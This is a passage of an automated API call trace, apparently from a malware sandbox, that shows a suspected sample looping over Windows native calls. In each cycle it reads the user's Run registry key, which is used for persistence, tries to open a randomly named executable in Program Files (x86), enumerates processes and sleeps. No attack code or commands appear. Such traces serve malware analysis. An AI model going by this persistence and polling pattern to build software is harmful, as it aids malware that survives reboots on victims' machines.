SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.238] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.254] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.254] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.254] NtClose (Handle=0x14c) returned 0x0 [0258.254] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.254] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.255] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.255] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.255] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.255] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.350] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.356] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.356] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.356] NtClose (Handle=0x14c) returned 0x0 [0258.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.356] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.356] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.356] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.357] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.446] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.449] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.449] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.449] NtClose (Handle=0x14c) returned 0x0 [0258.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.449] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.449] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.449] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.449] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.537] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.542] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.542] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.542] NtClose (Handle=0x14c) returned 0x0 [0258.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.542] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.543] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.543] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.543] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.543] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.624] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.636] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.636] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.636] NtClose (Handle=0x14c) returned 0x0 [0258.636] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.636] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.636] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.637] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.637] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.637] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.729] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.729] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.730] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.730] NtClose (Handle=0x14c) returned 0x0 [0258.730] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.730] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.730] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.730] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.730] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.730] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.839] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0259.112] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0259.112] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0259.112] NtClose (Handle=0x14c) returned 0x0 [0259.112] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.113] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.113] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0259.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.113] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.113] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0259.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0259.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0259.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0259.291] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0259.328] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0259.328] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0259.329] NtClose (Handle=0x14c) returned 0x0 [0259.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.329] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.329] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0259.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 